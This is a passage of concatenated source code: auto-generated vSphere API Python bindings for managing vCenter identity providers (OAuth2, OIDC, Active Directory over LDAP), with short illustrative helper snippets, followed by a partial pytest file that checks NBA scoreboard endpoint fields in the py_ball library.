the key and a vCenter Server group as the value. This attribute was
added in vSphere API 7.0.0.
:type issuer: :class:`str`
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod`
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: if the map is not empty, a
"?" is added to the endpoint URL, and each combination of a key and
a string in its value is appended with an "&" delimiter. Details:
* If the value contains only one string, the key is added as
"k=v".
* If the value is an empty list, the key is added without a
"=v".
* If the value contains multiple strings, the key is repeated in
the query string for each string in the value.
This attribute was added in vSphere API 7.0.0.
If None, the map will be empty.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2CreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_create_spec', {
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'public_key_uri': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
'issuer': type.StringType(),
'authentication_method': type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod'),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
Oauth2CreateSpec,
False,
None))
class Oauth2UpdateSpec(VapiStruct):
"""
The ``Providers.Oauth2UpdateSpec`` class contains the information used to
update the OAuth2 identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str` or ``None``
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type token_endpoint: :class:`str` or ``None``
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
If None, leaves value unchanged.
:type public_key_uri: :class:`str` or ``None``
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_id: :class:`str` or ``None``
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_secret: :class:`str` or ``None``
:param client_secret: Shared secret between identity provider and client. This attribute
was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type claim_map: (:class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)) or ``None``
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
the incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as the value. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type issuer: :class:`str` or ``None``
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
If None, leaves value unchanged.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod` or ``None``
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params: key/value pairs that are to be appended to the authEndpoint
request. How to append to authEndpoint request: if the map is not
empty, a "?" is added to the endpoint URL, and each combination of
a key and a string in its value is appended with an "&" delimiter.
Details:
* If the value contains only one string, the key is added as
"k=v".
* If the value is an empty list, the key is added without a
"=v".
* If the value contains multiple strings, the key is repeated in
the query string for each string in the value.
If the map is empty, all params are deleted. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2UpdateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_update_spec', {
'auth_endpoint': type.OptionalType(type.URIType()),
'token_endpoint': type.OptionalType(type.URIType()),
'public_key_uri': type.OptionalType(type.URIType()),
'client_id': type.OptionalType(type.StringType()),
'client_secret': type.OptionalType(type.StringType()),
'claim_map': type.OptionalType(type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType())))),
'issuer': type.OptionalType(type.StringType()),
'authentication_method': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod')),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
Oauth2UpdateSpec,
False,
None))
class OidcSummary(VapiStruct):
"""
The ``Providers.OidcSummary`` class contains commonly used information
about an OIDC identity provider. OIDC is a discovery protocol for OAuth2
configuration metadata, so ``Providers.OidcSummary`` contains discovered
OAuth2 metadata. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
logout_endpoint=None,
auth_endpoint=None,
token_endpoint=None,
client_id=None,
authentication_header=None,
auth_query_params=None,
):
"""
:type discovery_endpoint: :class:`str`
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type logout_endpoint: :class:`str`
:param logout_endpoint: The endpoint to use for terminating the user's session at the
identity provider. This value is automatically derived from the
metadata information provided by the OIDC discovery endpoint. This
attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type authentication_header: :class:`str`
:param authentication_header: The authentication data used as part of the request header to
acquire or refresh an OAuth2 token. The data format depends on the
authentication method used. Example of basic authentication format:
Authorization: Basic [base64Encode(clientId + ":" + secret)]. This
attribute was added in vSphere API 7.0.0.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: if the map is not empty, a
"?" is added to the endpoint URL, and each combination of a key and
a string in its value is appended with an "&" delimiter. Details:
* If the value contains only one string, the key is added as
"k=v".
* If the value is an empty list, the key is added without a
"=v".
* If the value contains multiple strings, the key is repeated in
the query string for each string in the value.
This attribute was added in vSphere API 7.0.0.
"""
self.discovery_endpoint = discovery_endpoint
self.logout_endpoint = logout_endpoint
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.client_id = client_id
self.authentication_header = authentication_header
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
OidcSummary._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_summary', {
'discovery_endpoint': type.OptionalType(type.URIType()),
'logout_endpoint': type.OptionalType(type.URIType()),
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'client_id': type.StringType(),
'authentication_header': type.StringType(),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
OidcSummary,
False,
None))
class OidcInfo(VapiStruct):
"""
The ``Providers.OidcInfo`` class contains information about an OIDC
identity provider. OIDC is a discovery protocol for OAuth2 configuration
metadata, so ``Providers.OidcInfo`` contains additional discovered OAuth2
metadata. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
logout_endpoint=None,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type discovery_endpoint: :class:`str`
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
:type logout_endpoint: :class:`str`
:param logout_endpoint: The endpoint to use for terminating the user's session at the
identity provider. This value is automatically derived from the
metadata information provided by the OIDC discovery endpoint. This
attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type public_key_uri: :class:`str`
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as value. This attribute was
added in vSphere API 7.0.0.
:type issuer: :class:`str`
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod`
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How the parameters are appended to the authEndpoint request: if the
map is not empty, a "?" is added to the endpoint URL, and each
key/value combination is appended with an "&" delimiter. Details:

* If the value contains only one string, the pair is added as
  "k=v".
* If the value is an empty list, the key is added without a "=v"
  suffix.
* If the value contains multiple strings, the key is repeated in
  the query string, once for each string in the value.

This attribute was added in vSphere API 7.0.0.
"""
self.discovery_endpoint = discovery_endpoint
self.logout_endpoint = logout_endpoint
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
OidcInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_info', {
'discovery_endpoint': type.URIType(),
'logout_endpoint': type.OptionalType(type.URIType()),
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'public_key_uri': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
'issuer': type.StringType(),
'authentication_method': type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod'),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
OidcInfo,
False,
None))
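The query-parameter rules spelled out in the ``auth_query_params`` docstring above can be sketched as a small standalone helper. This is illustrative only; the name ``build_auth_url`` is not part of these bindings, and the real request construction happens inside the identity provider integration:

```python
def build_auth_url(endpoint, auth_query_params):
    """Append auth_query_params to the auth endpoint per the documented rules."""
    if not auth_query_params:
        return endpoint
    parts = []
    for key, values in auth_query_params.items():
        if not values:
            parts.append(key)  # empty list: key is added without "=v"
        else:
            for value in values:  # key repeated once per string in the value
                parts.append("%s=%s" % (key, value))
    return endpoint + "?" + "&".join(parts)


print(build_auth_url("https://idp.example.test/auth", {"a": ["1", "2"], "b": []}))
# -> https://idp.example.test/auth?a=1&a=2&b
```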
class OidcCreateSpec(VapiStruct):
"""
The ``Providers.OidcCreateSpec`` class contains the information used to
create an OIDC identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
client_id=None,
client_secret=None,
claim_map=None,
):
"""
:type discovery_endpoint: :class:`str`
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
the incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as the value. This attribute was
added in vSphere API 7.0.0.
"""
self.discovery_endpoint = discovery_endpoint
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
VapiStruct.__init__(self)
OidcCreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_create_spec', {
'discovery_endpoint': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
OidcCreateSpec,
False,
None))
class OidcUpdateSpec(VapiStruct):
"""
The ``Providers.OidcUpdateSpec`` class contains the information used to
update the OIDC identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
client_id=None,
client_secret=None,
claim_map=None,
):
"""
:type discovery_endpoint: :class:`str` or ``None``
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_id: :class:`str` or ``None``
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_secret: :class:`str` or ``None``
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type claim_map: (:class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)) or ``None``
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
the incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as the value. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
"""
self.discovery_endpoint = discovery_endpoint
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
VapiStruct.__init__(self)
OidcUpdateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_update_spec', {
'discovery_endpoint': type.OptionalType(type.URIType()),
'client_id': type.OptionalType(type.StringType()),
'client_secret': type.OptionalType(type.StringType()),
'claim_map': type.OptionalType(type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType())))),
},
OidcUpdateSpec,
False,
None))
class ActiveDirectoryOverLdap(VapiStruct):
"""
The ``Providers.ActiveDirectoryOverLdap`` class contains the information
about how to use an Active Directory over LDAP connection to allow
searching for users and groups if the identity provider is an On-Prem
service. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
user_name=None,
password=None,
users_base_dn=None,
groups_base_dn=None,
server_endpoints=None,
cert_chain=None,
):
"""
:type user_name: :class:`str`
:param user_name: User name to connect to the active directory server. This attribute
was added in vSphere API 7.0.0.
:type password: :class:`str`
:param password: Password to connect to the active directory server. This attribute
was added in vSphere API 7.0.0.
:type users_base_dn: :class:`str`
:param users_base_dn: Base distinguished name for users. This attribute was added in
vSphere API 7.0.0.
:type groups_base_dn: :class:`str`
:param groups_base_dn: Base distinguished name for groups. This attribute was added in
vSphere API 7.0.0.
:type server_endpoints: :class:`list` of :class:`str`
:param server_endpoints: Active directory server endpoints. At least one active directory
server endpoint must be set. This attribute was added in vSphere
API 7.0.0.
:type cert_chain: :class:`com.vmware.vcenter.certificate_management_client.X509CertChain` or ``None``
:param cert_chain: SSL certificate chain in base64 encoding. This attribute was added
in vSphere API 7.0.0.
This attribute can be None only if all the Active Directory server
endpoints use the LDAP (not LDAPS) protocol.
"""
self.user_name = user_name
self.password = password
self.users_base_dn = users_base_dn
self.groups_base_dn = groups_base_dn
self.server_endpoints = server_endpoints
self.cert_chain = cert_chain
VapiStruct.__init__(self)
ActiveDirectoryOverLdap._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.active_directory_over_ldap', {
'user_name': type.StringType(),
'password': type.SecretType(),
'users_base_dn': type.StringType(),
'groups_base_dn': type.StringType(),
'server_endpoints': type.ListType(type.URIType()),
'cert_chain': type.OptionalType(type.ReferenceType('com.vmware.vcenter.certificate_management_client', 'X509CertChain')),
},
ActiveDirectoryOverLdap,
False,
None))
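The ``cert_chain`` rule above (None is allowed only when every endpoint is plain LDAP) can be mirrored by a hypothetical client-side check. ``requires_cert_chain`` below is illustrative and not part of the bindings:

```python
def requires_cert_chain(server_endpoints):
    """True if any endpoint uses LDAPS, in which case cert_chain must be set."""
    return any(ep.lower().startswith("ldaps://") for ep in server_endpoints)


print(requires_cert_chain(["ldap://dc1.example.test:389"]))   # -> False
print(requires_cert_chain(["ldaps://dc1.example.test:636"]))  # -> True
```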
def list(self):
"""
Retrieve all identity providers. This method was added in vSphere API
7.0.0.
:rtype: :class:`list` of :class:`Providers.Summary`
:return: Commonly used information about the identity providers.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
"""
return self._invoke('list', None)
def get(self,
provider,
):
"""
Retrieve detailed information of the specified identity provider. This
method was added in vSphere API 7.0.0.
:type provider: :class:`str`
:param provider: the identifier of the provider
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:rtype: :class:`Providers.Info`
:return: Detailed information of the specified identity provider.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if no provider found with the given provider identifier.
"""
return self._invoke('get',
{
'provider': provider,
})
def create(self,
spec,
):
"""
Create a vCenter Server identity provider. This method was added in
vSphere API 7.0.0.
:type spec: :class:`Providers.CreateSpec`
:param spec: the CreateSpec containing the information used to create the provider
:rtype: :class:`str`
:return: The identifier of the created identity provider.
The return value will be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if invalid arguments are provided in createSpec.
"""
return self._invoke('create',
{
'spec': spec,
})
def update(self,
provider,
spec,
):
"""
Update a vCenter Server identity provider. This method was added in
vSphere API 7.0.0.
:type provider: :class:`str`
:param provider: the identifier of the provider to update
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:type spec: :class:`Providers.UpdateSpec`
:param spec: the UpdateSpec containing the information used to update the provider
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if invalid arguments are provided in updateSpec.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if no provider found with the given provider identifier.
"""
return self._invoke('update',
{
'provider': provider,
'spec': spec,
})
def delete(self,
provider,
):
"""
Delete a vCenter Server identity provider. This method was added in
vSphere API 7.0.0.
:type provider: :class:`str`
:param provider: the identifier of the provider to delete
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if no provider found with the given provider identifier.
"""
return self._invoke('delete',
{
'provider': provider,
})
class _ProvidersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/identity/providers',
path_variables={
},
query_parameters={
}
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
})
get_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/identity/providers/{providerid}',
path_variables={
'provider': 'providerid',
},
query_parameters={
}
)
# properties for create operation
create_input_type = type.StructType('operation-input', {
'spec': type.ReferenceType(__name__, 'Providers.CreateSpec'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/identity/providers',
path_variables={
},
query_parameters={
}
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
'spec': type.ReferenceType(__name__, 'Providers.UpdateSpec'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/vcenter/identity/providers/{providerid}',
path_variables={
'provider': 'providerid',
},
query_parameters={
}
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/vcenter/identity/providers/{providerid}',
path_variables={
'provider': 'providerid',
},
query_parameters={
}
)
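As an illustration of how the ``OperationRestMetadata`` above is consumed, here is a minimal sketch of substituting a path variable into a ``url_template``. ``resolve_url`` is a hypothetical helper; the actual resolution happens inside the vAPI REST runtime:

```python
def resolve_url(url_template, path_variables, params):
    """Fill {placeholder} slots in url_template from operation parameters."""
    url = url_template
    for param_name, placeholder in path_variables.items():
        url = url.replace("{%s}" % placeholder, params[param_name])
    return url


print(resolve_url("/vcenter/identity/providers/{providerid}",
                  {"provider": "providerid"},
                  {"provider": "my-oidc-provider"}))
# -> /vcenter/identity/providers/my-oidc-provider
```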
operations = {
'list': {
'input_type': list_input_type,
'output_type': type.ListType(type.ReferenceType(__name__, 'Providers.Summary')),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType(__name__, 'Providers.Info'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'create': {
'input_type': create_input_type,
'output_type': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.VoidType(),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'list': list_rest_metadata,
'get': get_rest_metadata,
'create': create_rest_metadata,
'update': update_rest_metadata,
'delete': delete_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.identity.providers',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class StubFactory(StubFactoryBase):
_attrs = {
'Providers': Providers,
}
# === File: py_ball/tests/test_scoreboard.py (repo: avyayv/py_ball, license: MIT) ===
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 23 21:54:48 2018
@author: patrickmcfarlane
test_scoreboard.py
This function contains the tests for
functions in the scoreboard.py file
"""
import time
from .__init__ import HEADERS
from ..scoreboard import ScoreBoard
def test_scoreboard():
""" tests the scoreboard endpoint of the ScoreBoard class
"""
time.sleep(1)
example_board = ScoreBoard(headers=HEADERS,
game_date='12/22/2018')
table_names = example_board.data.keys()
assert 'GameHeader' in table_names
assert 'LineScore' in table_names
assert 'SeriesStandings' in table_names
assert 'LastMeeting' in table_names
assert 'EastConfStandingsByDay' in table_names
assert 'WestConfStandingsByDay' in table_names
assert 'Available' in table_names
example_game = example_board.data['GameHeader'][0]
example_line = example_board.data['LineScore'][0]
example_series = example_board.data['SeriesStandings'][0]
example_last = example_board.data['LastMeeting'][0]
example_east = example_board.data['EastConfStandingsByDay'][0]
example_west = example_board.data['WestConfStandingsByDay'][0]
example_avail = example_board.data['Available'][0]
assert list(example_game.keys()) == ['GAME_DATE_EST',
'GAME_SEQUENCE',
'GAME_ID',
'GAME_STATUS_ID',
'GAME_STATUS_TEXT',
'GAMECODE',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'SEASON',
'LIVE_PERIOD',
'LIVE_PC_TIME',
'NATL_TV_BROADCASTER_ABBREVIATION',
'LIVE_PERIOD_TIME_BCAST',
'WH_STATUS']
assert list(example_line.keys()) == ['GAME_DATE_EST',
'GAME_SEQUENCE',
'GAME_ID',
'TEAM_ID',
'TEAM_ABBREVIATION',
'TEAM_CITY_NAME',
'TEAM_WINS_LOSSES',
'PTS_QTR1',
'PTS_QTR2',
'PTS_QTR3',
'PTS_QTR4',
'PTS_OT1',
'PTS_OT2',
'PTS_OT3',
'PTS_OT4',
'PTS_OT5',
'PTS_OT6',
'PTS_OT7',
'PTS_OT8',
'PTS_OT9',
'PTS_OT10',
'PTS',
'FG_PCT',
'FT_PCT',
'FG3_PCT',
'AST',
'REB',
'TOV']
assert list(example_series.keys()) == ['GAME_ID',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'GAME_DATE_EST',
'HOME_TEAM_WINS',
'HOME_TEAM_LOSSES',
'SERIES_LEADER']
assert list(example_last.keys()) == ['GAME_ID',
'LAST_GAME_ID',
'LAST_GAME_DATE_EST',
'LAST_GAME_HOME_TEAM_ID',
'LAST_GAME_HOME_TEAM_CITY',
'LAST_GAME_HOME_TEAM_NAME',
'LAST_GAME_HOME_TEAM_ABBREVIATION',
'LAST_GAME_HOME_TEAM_POINTS',
'LAST_GAME_VISITOR_TEAM_ID',
'LAST_GAME_VISITOR_TEAM_CITY',
'LAST_GAME_VISITOR_TEAM_NAME',
'LAST_GAME_VISITOR_TEAM_CITY1',
'LAST_GAME_VISITOR_TEAM_POINTS']
assert list(example_east.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_west.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_avail.keys()) == ['GAME_ID', 'PT_AVAILABLE']
def test_scoreboardv2():
""" tests the scoreboardv2 endpoint of the ScoreBoard class
"""
time.sleep(1)
example_board = ScoreBoard(headers=HEADERS,
endpoint='scoreboardv2',
game_date='12/22/2018')
table_names = example_board.data.keys()
assert 'GameHeader' in table_names
assert 'LineScore' in table_names
assert 'SeriesStandings' in table_names
assert 'LastMeeting' in table_names
assert 'EastConfStandingsByDay' in table_names
assert 'WestConfStandingsByDay' in table_names
assert 'Available' in table_names
assert 'TeamLeaders' in table_names
assert 'TicketLinks' in table_names
assert 'WinProbability' in table_names
example_game = example_board.data['GameHeader'][0]
example_line = example_board.data['LineScore'][0]
example_series = example_board.data['SeriesStandings'][0]
example_last = example_board.data['LastMeeting'][0]
example_east = example_board.data['EastConfStandingsByDay'][0]
example_west = example_board.data['WestConfStandingsByDay'][0]
example_avail = example_board.data['Available'][0]
example_lead = example_board.data['TeamLeaders'][0]
example_tick = example_board.data['TicketLinks'][0]
assert list(example_game.keys()) == ['GAME_DATE_EST',
